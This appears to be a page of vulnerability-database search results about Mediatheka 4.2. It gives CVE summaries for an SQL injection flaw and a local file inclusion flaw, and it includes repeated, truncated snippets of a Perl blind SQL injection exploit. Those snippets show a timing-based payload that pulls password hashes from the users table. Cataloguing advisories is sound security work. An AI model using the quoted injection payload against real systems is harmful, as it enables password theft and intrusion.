21 matches found
EUVD-2008-5864
Malware in sbrugna...
EUVD-2008-5865
Malware in sbrugna...
Mediatheka <= 4.2 - Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl -w Mediatheka = 4.2 Remote Blind SQL Injection Exploit by athos - stakerathotmaildotit use strict; use LWP::UserAgent; my $stop,$start,$hash; my $domain = shift; my $userid = shift or my @chars = 48..57, 97..102; my $substr = 1; my $http = new...
CVE-2008-5895
SQL injection vulnerability in connection.php in Mediatheka 4.2 and earlier allows remote attackers to execute arbitrary SQL commands via the user parameter...
CVE-2008-5894
Directory traversal vulnerability in index.php in Mediatheka 4.2 allows remote attackers to include and execute arbitrary local files via a .. dot dot in the lang parameter...
Sql injection
SQL injection vulnerability in connection.php in Mediatheka 4.2 and earlier allows remote attackers to execute arbitrary SQL commands via the user parameter...
Directory traversal
Directory traversal vulnerability in index.php in Mediatheka 4.2 allows remote attackers to include and execute arbitrary local files via a .. dot dot in the lang parameter...
CVE-2008-5894
Directory traversal vulnerability in index.php in Mediatheka 4.2 allows remote attackers to include and execute arbitrary local files via a .. dot dot in the lang parameter...
CVE-2008-5895
CVE-2008-5895 describes an SQL injection vulnerability in Mediatheka 4.2 and earlier, occurring in the connection.php file via the user parameter. The flaw allows remote attackers to execute arbitrary SQL commands, with impact including partial confidentiality/integrity/availability as per the CV...
CVE-2008-5894
CVE-2008-5894 is a directory traversal vulnerability in Mediatheka 4.2. The flaw resides in index.php, where the lang parameter can be manipulated (..) to cause local file inclusion and execution. Attackers could leverage this to read or potentially execute arbitrary local files on the affected s...
CVE-2008-5895
SQL injection vulnerability in connection.php in Mediatheka 4.2 and earlier allows remote attackers to execute arbitrary SQL commands via the user parameter...
Mediatheka 4.2 Blind SQL Injection
!/usr/bin/perl -w Mediatheka post$host, user = $param, password = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "password,$uidz,1=$charz,". "benchmark200000000,char0,". "0 from users where id=$userid"; return $send; for1..32 foreach my...
Mediatheka 4.2 - Blind SQL Injection
Mediatheka 4.2 - Blind SQL Injection !/usr/bin/perl -w Mediatheka post$host, user = $param, password = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "password,$uidz,1=$charz,". "benchmark200000000,char0,". "0 from users where id=$userid";...
Mediatheka <= 4.2 Remote Blind SQL Injection Exploit
Exploit for unknown platform in category web applications ==================================================== Mediatheka post$host, user = $param, password = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "password,$uidz,1=$charz,"...
Mediatheka <= 4.2 Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl -w Mediatheka = 4.2 Remote Blind SQL Injection Exploit by athos - stakerathotmaildotit use strict; use LWP::UserAgent; my $stop,$start,$hash; my $domain = shift; my $userid = shift or my @chars = 48..57, 97..102; my $substr = 1; my $http = new...
Mediatheka 4.2 - Blind SQL Injection
!/usr/bin/perl -w Mediatheka post$host, user = $param, password = 'anything' ; sub givechar my $send = undef; my $charz,$uidz = @; $send = "' or select ifasciisubstring". "password,$uidz,1=$charz,". "benchmark200000000,char0,". "0 from users where id=$userid"; return $send; for1..32 foreach my...
Mediatheka 4.2 Local File Inclusion
START 0x01 Informations: Script : Mediatheka 4.2 Download : http://www.hotscripts.com/jump.php?listingid=79106&jumptype=1 Vulnerability : Local File Inclusion Author : Osirys Contact : osirysatlivedotit Notes : Proud to be Italian Greets: : XaDoS, x0r, emgent, Jay, str0ke 0x02 Bug:Local File...
Mediatheka 4.2 (index.php lang) Local File Inclusion Vulnerability
Exploit for unknown platform in category web applications ================================================================== Mediatheka 4.2 index.php lang Local File Inclusion Vulnerability ================================================================== START 0x01 Informations: Script :...
Mediatheka 4.2 - lang Local File Inclusion
Mediatheka 4.2 - lang Local File Inclusion START 0x01 Informations: Script : Mediatheka 4.2 Download : http://www.hotscripts.com/jump.php?listingid=79106&jumptype=1 Vulnerability : Local File Inclusion Author : Osirys Contact : osirysatlivedotit Notes : Proud to be Italian Greets: : XaDoS, x0r,...
Mediatheka 4.2 (index.php lang) Local File Inclusion Vulnerability
No description provided by source. START 0x01 Informations: Script : Mediatheka 4.2 Download : http://www.hotscripts.com/jump.php?listingid=79106&jumptype=1 Vulnerability : Local File Inclusion Author : Osirys Contact : osirysatlivedotit Notes : Proud to be Italian Greets: : XaDoS, x0r, emgent,...